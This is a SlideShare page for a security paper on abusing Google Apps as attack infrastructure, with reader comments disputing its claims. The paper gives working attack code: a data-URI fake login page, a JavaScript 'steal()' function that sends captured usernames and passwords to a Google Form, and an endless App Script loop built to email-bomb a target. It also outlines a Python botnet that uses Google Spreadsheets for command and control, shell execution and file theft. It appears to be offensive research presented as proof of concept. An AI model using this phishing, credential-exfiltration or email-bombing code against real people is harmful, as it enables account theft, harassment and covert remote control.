Abusing Google Apps and Data API: Google is My Command and Control Center
Upcoming SlideShare
Loading in...5
×
 

Abusing Google Apps and Data API: Google is My Command and Control Center

on

  • 1,605 views

Google Apps is a cloud-based productivity suite used by a large section of people ...

Google Apps is a cloud-based productivity suite used by a large section of people
including Corporate, Academic and Home users. This paper is about abusing innocent
Google Apps and Data API to implement offensive attacks. The major and widely used
Google Apps like Google Forms, Google Spreadsheet and Google Script as well as the
Google Apps API can be abused for implementing various attack vectors. This paper
will look into the following things:
1. Phishing with Data URI and Google Forms.
2. E-mail Bombing regenerated with Google App Script.
3. Implementing a Cross-Platform Botnet with its C&C hosted with Google.

Statistics

Views

Total Views
1,605
Views on SlideShare
1,353
Embed Views
252

Actions

Likes
1
Downloads
22
Comments
3

4 Embeds 252

http://opensecurity.in 249
http://feedly.com 1
http://www.inoreader.com 1
http://www.slideee.com 1

Accessibility

Categories

Upload Details

Uploaded via as Adobe PDF

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
  • @ajin25 Dude,
    1. Here, Google form is used only as an end point to collect the data. You can setup a website on your own instead. You make it sound like Google forms has a vulnerability that makes it a phishing tool.
    2. If you have 100 google accounts, you can use offline clients or other softwares to authenticate properly and send more mails than the appscript allows you to do with the same 100 accounts.
    The problem here is that you will have to sign up for new accounts to send more mails. Again, app script has no vulnerability.
    3. Where do you host the xBOT?
    Are you sure you want to
    Your message goes here
    Processing…
  • @asdofindia Well you didn't quite understand the concept then.
    check these out first

    http://www.slideshare.net/ajin25/abusing-google-apps-and-data-api-google-is-my-command-and-control-center

    http://www.youtube.com/watch?v=htoiNO50fBc&feature=c4-overview&list=UUydYZGwQcBRDFpe07M03Tqw
    http://www.youtube.com/watch?v=mTHIcdkdKXY&feature=c4-overview&list=UUydYZGwQcBRDFpe07M03Tqw
    http://www.youtube.com/watch?v=TBP7ynUalOY&feature=c4-overview&list=UUydYZGwQcBRDFpe07M03Tqw

    1. You will understand once you watch the video.
    2. I didn't quite understand what you exactly meant. Well difference of this email bombing is it appears legitimate and never end up in spam box in case of google mail user.
    3.Well this shell, screenshot, upload download works via xbot client which make use of Google Data API to establish it's communication channel.

    Read the paper carefully before jumping into such conclusions.

    'Fools are always fools nobody needs to push them and that's why there are called fools. This methodology works as long as one gains some commonsense'
    Are you sure you want to
    Your message goes here
    Processing…
  • 1. What is Google Forms' role in this?
    2. It is much easier to create a filter and send you to spam, and later for google to ban your email address than for you to create new google accounts to execute this email bombing.
    3. Obscure it as much as you can, but you are definitely not gonna do a shell/screenshot/upload-download on anyone's computer using google APIs.

    You can't fool everyone for a long time.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment

Abusing Google Apps and Data API: Google is My Command and Control Center Abusing Google Apps and Data API: Google is My Command and Control Center Document Transcript

  • Abusing Google Apps: Google is my Command and Control Center Ajin Abraham ajin25@gmail.com www.opensecurity.in INTRODUCTION Google Apps is a cloud-based productivity suite used by a large section of people including Corporate, Academic and Home users. This paper is about abusing innocent Google Apps and Data API to implement offensive attacks. The major and widely used Google Apps like Google Forms, Google Spreadsheet and Google Script as well as the Google Apps API can be abused for implementing various attack vectors. This paper will look into the following things: 1. Phishing with Data URI and Google Forms. 2. E-mail Bombing regenerated with Google App Script. 3. Implementing a Cross-Platform Botnet with its C&C hosted with Google. ABUSING DATA URI AND GOOGLE FORMS Data URI is a URI scheme that allows a web developer to include inline code into webpages. These codes are executed as if they were from external sources. It was discovered before and discussed in klevjers’s paper about Data URI that by abusing Data URI and URL Shortners, hackers can implement a brand new phishing attack. The data URI may looks like the following. data:text/html,<title>Login</title><p align="center">Email:<input type="text"><br>Password:<input type="text"><br><input type="submit" value="Log in"> So this piece of code will get executed once you provide this in the URL field of a browser. One could easily use an URL Shortner service to shorten the data URI. We are utilizing this previous knowledge to implement Hostless Phishing. Hostless Phishing means the phisher is hosted nowhere as such. However one can say
  • that the source code is stored in the URL Shortner’s database. We will do some workarounds to bypass the URL length restrictions enforced by the browsers. We use a bit of AJAX and Google Forms to implement this. We will inject the following AJAX which will capture all the keystrokes and send them to a Google Form and the data is logged in the attached Spreadsheet. <script> function steal() { var us = document.fb.email.value; var ps = document.fb.pass.value; var http=new XMLHttpRequest(); var url = "<form_action>"; var params = "<text_field>=USERNAME: "+us+" PASS: "+ps; http.open("POST", url, true); http.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); http.send(params); sleep(1000); } function sleep(milliseconds) { var start = new Date().getTime(); for (var i = 0; i < 1e7; i++) { if ((new Date().getTime() - start) > milliseconds){ break; } } } </script> So the final PoC will be include a genuine page’s source code, injected with a Keylogging AJAX and this source is base encoded and crafted as a DATA URI and finally URL shortened. EMAIL BOMBING WITH GOOGLE APPSCRIPT A single line of code inside a loop is required to start an Email Bombing with Google App Script. App Script is much alike or almost like native Java Script with addition classes to support Google Apps. To send a mail with a Google App Script you can use a single line of code. MailApp.sendEmail(‘to’,’subject’,’message’); So simply you can put it inside a loop to perform an Email bombing. But since the mail contents are all the same, in most of the modern email apps, all the similar mails are
  • stored under one email entry inbox, followed by the number of new mails. It forms a hierarchical structure rather than separate new email entry. In order to bypass that, we will send a mail with varying content each time. The following code can do the needful. sub=1; msg=2; while(1) { MailApp.sendEmail(“someone@somewhere.com”,sub,msg); sub++; msg++; } So this simple script can cause an Email Bombing the targeted email address. To prevent this Google has applied a limit to the no of emails that can be send from an account. But still you can run the script from multiple accounts, making it more effective. It is observed that 98% of the messages are entering the email inbox rather than ending up as Spam since the email headers are genuine, not caught by the spam filters and obviously because they not blacklisted by the filters. ABUSING GOOGLE API TO CONVERT GOOGLE APPS AS THE COMMAND AND CONTROL CENTER FOR A BOTNET. Xenotix xBOT is a powerful cross platform (Linux, Windows, Mac) bot written in Python that abuse certain Google Services to implement Command & Control Center for the botnet. The Google Apps Data API, Google Forms and Google Spreadsheet is abused to implement C2 for a bot network. The Google Forms can act as the C2 for a bot network. All the entries to the Google Form are send to an attached Spreadsheet. Here we can implement a bot that will listen to the Google Data API URL and extract the commands and later send back the
  • response via the same Form. The Google Data API allows us to fetch the contents of a published spreadsheet in a variety of formats. The spreadsheet feeds are fetched in RSS format and will parsed. For implementing the bot we will parse through the source, fetch the commands and do the corresponding operations. Fig1: Sample of Spreadsheet Feeds with commands and responses. The xBOT's communication is encrypted as it uses Google's own SSL connection and is nowhere affected by any firewalls or the ISP's tricky network configurations. The botnet's commands and responses are encrypted making it harder to sniff the bot’s communications. This Bot will be a prototype bot with the bare minimum features of a Typical Bot. The intention of the paper is to give an idea about how Google API’s can be abused for Botnet Implementation. xBOT will be capable of performing operations like shell command execution, downloading and uploading files, screen capturing, port scanning etc. References https://developers.google.com/gdata/samples?hl=en https://developers.google.com/apps-script/ http://klevjers.com/papers/phishing.pdf